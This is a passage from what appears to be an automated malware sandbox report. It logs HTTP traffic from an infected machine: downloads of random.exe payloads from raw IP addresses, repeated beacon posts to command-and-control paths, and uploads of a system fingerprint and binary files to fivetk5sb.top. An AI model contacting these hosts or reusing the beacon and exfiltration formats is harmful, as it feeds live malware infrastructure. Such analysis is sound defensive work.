r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: GET /files/martin/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019805001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1Host: home.fivetk5sb.topAccept: */*Content-Type: application/jsonContent-Length: 467287Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 36 36 35 38 38 33 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 2
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019806001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /niCGMfnfOxUBXxpLhBBB1734796753?argument=sqcim1nDAay1ts2z1734830229 HTTP/1.1Host: home.fivetk5sb.topAccept: */*
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019807001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019808001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------3Hmb0Xz54igKmXytiHgVfoData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 48 6d 62 30 58 7a 35 34 69 67 4b 6d 58 79 74 69 48 67 56 66 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 61 68 69 63 6f 68 61 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0b b3 05 ba 73 48 ad 01 6e bb fb e0 d9 b6 f5 c5 cd 81 ac 5b c2 9a 4a b9 ee dc 78 7b 01 2e cc 4a 24 16 4c 34 7e c8 8f 31 c6 5d 5e 59 25 bc f3 54 8c 89 be a4 19 75 f5 f4 a7 2c f9 34 2b e1 e4 8e 8e 0e ce ee b6 6f 2a 23 0a e1 56 45 8a 16 7a ed 43 e0 5a 3b 48 81 26 05 d1 3c ff ff db 00 24 04 07 67 ad 5f 57 c7 1b bb 86 e3 4c 83 88 5f 60 09 fa 09 17 39 a3 e9 eb 4e 21 01 be 17 45 e9 0d 70 84 a2 12 7c f7 96 31 9f 5c 1d 19 bb 79 c0 a5 08 f3 29 6a aa d4 e8 d7 42 cf f7 ab a4 7e 69 34 d0 60 8c 14 21 af 98 eb 63 37 92 13 26 2a 81 10 05 ac 67 8b 8d 26 e4 4b c3 0f 06 2c a3 18 dc 15 8a 37 17 50 66 a8 c6 ab fc b8 60 ee d4 19 fc 06 78 10 04 81 9a 1d 38 21 78 dc 10 71 4a 11 b9 94 b8 c5 e4 49 c0 ab cb c2 16 72 99 c2 2a cd 41 9c 2d a0 8f 3f 8b 6a c1 2a 17 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 48 6d 62 30 58 7a 35 34 69 67 4b 6d 58 79 74 69 48 67 56 66 6f 2d 2d 0d 0a Data Ascii: --------------------------3Hmb0Xz54igKmXytiHgVfoContent-Disposition: form-data; name="file"; filename="Zahicoha.bin"Content-Type: application/octet-streamsHn[Jx{.J$L4~1]^Y%Tu,4+o*#VEzCZ;H&<$g_WL_`9N!Ep|1\y)jB~i4`!c7&*g&K,7Pf`x8!xqJIr*A-?j*--------------------------3Hmb0Xz54igKmXytiHgVfo--
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fivetk5sb.topAccept: */*Content-Length: 63842Content-Type: multipart/form-data; boundary=------------------------F6Kt4zmRl4u7Vp1IRRQ2QmData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 46 36 4b 74 34 7a 6d 52 6c 34 75 37 56 70 31 49 52 52 51 32 51 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 65 64 61 62 6f 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2f 11 09 f9 b5 66 22 f1 26 3a 44 bc 01 66 15 08 04 49 b6 cf 3b 1e 13 11 78 b4 c9 43 c6 6f fa cc d2 cc dc e0 4d 06 d5 b0 b2 7e ce eb 11 3c 66 b4 50 ab c6 fe ed 51 f1 1a 87 55 81 1d 74 24 07 85 6c a6 06 ff de cb 95 4a 8e 20 0f 4f 38 f9 3c ea 88 45 51 b5 53 49 49 42 7d 89 8d f3 8a 82 40 67 d4 c7 46 bb 89 52 22 06 08 2c 2f 27 fd 2d d1 cd 8d 4f 0c 28 ea e7 1f a3 e8 16 f0 9c 66 69 68 3b b6 23 ac 84 33 5d 7c 1d 72 f7 26 48 a3 90 37 05 c0 f7 32 3f 9d b0 db 0d a9 58 c0 3a f7 e1 df 60 1a 25 1f 81 e3 14 98 ec 74 19 9b ef 5d db de 38 95 ef 6f 6b 4e ff 55 86 3f 84 cc 96 7c 30 d7 be 9e 77 cf 6b 89 dd 44 54 e5 02 b8 cd 55 bd 98 11 bf e4 6c 2c 4b 43 cd 07 3f 5e 5b f4 c7 f0 f7 a6 f7 80 ef 1c 7c 11 e0 c7 f0 0d 40 d3 d8 f5 f1 e7 64 a9 b9 e0 ca b3 24 62 b2 38 e4 af 5b d1 6d 71 0b bd 8b 42 ba 4f 98 66 14 fd e5 26 15 25 26 cc 14 33 59 0d 86 80 7f bd 8b 20 b5 22 71 13 f4 06 a1 97 f0 97 4d 5d ad 2f dd 9f ef e8 68 74 6a 6e 64 64 fa 09 52 d6 6d 15 e9 42 0a 14 12 ff 96 be d2 f1 9a b2 1a 4a 14 68 32 2f 4c 8d 4a 9d f6 03 58 f2 09 00 08 e0 31 06 4d a5 19 9a 3e dc e5 da b2 a0 d2 4a 0d 6c c1 40 cd fa 1c c4 6c d8 cc 07 83 24 d1 ae 29 f6 2a 95 f8 5a 72 6e fa 12 68 ff d5 7b 36 5b c2 82 cd c0 3d ff 65 af 46 b3 cf 30 f3 b3 8c c8 95 07 ed a9 c6 e8 2b bb 90 e9 a9 d4 09 c8 70 47 ed 33 17 50 10 2b a1 12 e1 b5 96 4c 27 8d 0d 4d b8 fd cf 3f 02 da 46 02 85 68 21 d8 12 ae 43 06 a1 52 b5 6c 2a 5c bc fe bb 7f 68 0f 71 ef 27 da 45 31 c7 24 09 a6 ec 3d 57 45 7c 1f 02 fc e4 66 c1 2c b1 28 05 4c 75 8c 41 01 75 7c 1a 89 79 8d b0 62 e5 37 db 76 19 bc aa 8d 2c eb f7 12 b3 fe 92 02 24 10 99 be 19 16 be 5e eb 68 af ee 02 a8 60 0f 05 48 b6 49 2a 60 06 9f f7 05 8d 84 54 3d 82 56 d7 36 e8 cf d7 2b 44 56 5d e9 fc b5 0a 13 97 f6 8c 1f 38 2d 0c af 23 54 59 80 7b fd 5e fc 12 2b 3b fd b2 68 8a 9b ba c2 e2 32 06 cd e4 e1 54 fd 04 29 bd b8 d5 a7 c7 ba 97 b5 3a 63 9f b0 e5 9a 29 64 35 43 45 80 e8 95 80 5a 45 47 da a7 68 df 97 f6 d9 3b 97 c5 87 bf 6c 2b 01 3f 5b ba a1 91 6e f4 bd 95 ac f2 32 30 e8 cb 32 8f 8d 31 56 92 23 37 a2 0f 9a 87 bf 4e 6a c9 94 8c 87 2d da e5 27 6b a4 e7 5b cb 6b ac 8f 2a ab 9e 55 a9 80 d5 43 4b 2c 71 78 4d 48 f2 16 21 3b d1 b9 80 05 5e 06 af 21 1a ca 1f 86 30 61 d1 07 04 65 58 77 bb 22 00 53 a2 4b 4c 7a 04 63 e4 aa 7c 87 a8 1b eb db 7d 05 bf 5c eb 0c a8 c4 0a e3 4b 10 7c b9 2f f4 6b 89 f0 59 7c 8f 34 a3 31 20 0c 2c 07 e3 fe c6 d3 84
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 30 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019809001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 38 31 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019810001&unit=246122658369
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 212.193.31.8Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33 Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
